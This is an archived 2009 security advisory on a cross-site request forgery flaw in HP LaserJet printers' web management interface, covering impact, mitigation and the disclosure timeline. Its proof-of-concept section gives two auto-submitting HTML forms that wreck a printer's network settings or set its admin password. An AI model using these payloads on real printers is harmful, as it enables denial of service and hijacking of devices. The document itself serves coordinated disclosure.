what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP LaserJet Cross Site Request Forgery

HP LaserJet Cross Site Request Forgery
Posted Mar 18, 2009
Authored by Henri Lindberg | Site louhi.fi

The HP LaserJet web management interface suffers from cross site request forgery and insecure default configuration vulnerabilities.

tags | exploit, web, vulnerability, csrf
SHA-256 | 57f014c142d2ed6d34415ced0e89ebbe42259af4291756e1337c57f0ff359dc5

HP LaserJet Cross Site Request Forgery

Change Mirror Download
                           Louhi Networks Oy
-= Security Advisory =-


Advisory: HP LaserJet multiple models web management CSRF
vulnerability & insecure default configuration
Release Date: 2009-03-17
Last Modified: 2009-03-17
Authors: Henri Lindberg, CISA
[henri d0t lindberg at louhi d0t fi]

Application: HP Embedded Web Server
Devices: HP LaserJet M1522n MFP,
HP Color LaserJet 2605dtn
possibly other HP products
Attack type : CSRF
Risk: Low
Vendor Status: Issue documented in a customer notice
References: http://www.louhinetworks.fi/advisory/HP_20090317.txt

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566


Overview:

Quote from http://www.hp.com:

"Increase effectiveness and productivity with an easy-to-use
high-performance HP MFP. HP spherical toner and an intelligent
cartridge optimise print quality and reliability. Do more with
fast, high-quality print, copy, scan and fax functionality.

This affordable HP MFP delivers print, copy, scan and fax
functionality. Hi-Speed USB 2.0 connectivity and fast,
secure networking enable you to easily share this device.
Handle complex files with a 450 MHz processor and memory up to
64 MB."


Details:

Default configuration for the device does not require user to
define password for configuration changes.

Insecure out-of-the-box configuration combined with CSRF
vulnerability in web management interface allows attacker to
perform unwanted configuration changes through user's browser.

Successful exploitation requires:
1) Out-of-the-box configuration (no management password)
2) Internal user with access to web management interface
3) Knowledge of target printer's DNS name or IP address
4) Ability to lure internal user to a malicious website or
ability to inject malicious HTML/javascript to website
frequented by said internal user.

Simplest management interfaces contains few interesting
features, most significant impact can be achieved with invalid
network configuration. This results in denial-of-service
condition, requiring manual reconfiguration in order to
restore network connectivity.

More advanced management interfaces based on the some software
may contain additional features suitable for exploitation.
It is recommended to check the features of management interface
in order to determine the actual risk for the used product.

Mitigation:

1) Set administrator password
2) Do not browse untrusted sites while logged on to the
management interface


Advisory timeline:
2009-02-17 Contacted vendor through e-mail.
2009-02-17 Vendor response.
2009-03-12 Vendor decides not to patch but to release
a customer notice
2009-03-17 Coordinated release of information
Vendor's customer notice:
HP Security Notice HPSN-2009-001 rev.1
HP LaserJet Printers, HP Edgeline Printers,
and HP Digital Senders - Unverified Input



Proof of Concept:

<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post"
ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config";
style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration"
value="IPConfig=Man&IPAddr=1.1.1.1&SN=2.2.2.2&GW=3.3.3.3&WINS=0.0.0.0">
</form>
</body>
</html>

Invalid value for "Configuration" parameter sets IP, mask and gw to
255.255.255.255


<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post"
ACTION="http://1.2.3.4/hp/device/set_config_password.html/config";
style="display:none">
<INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
<INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
<INPUT type="hidden" VALUE="System">
</FORM>
</body>
<html>
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close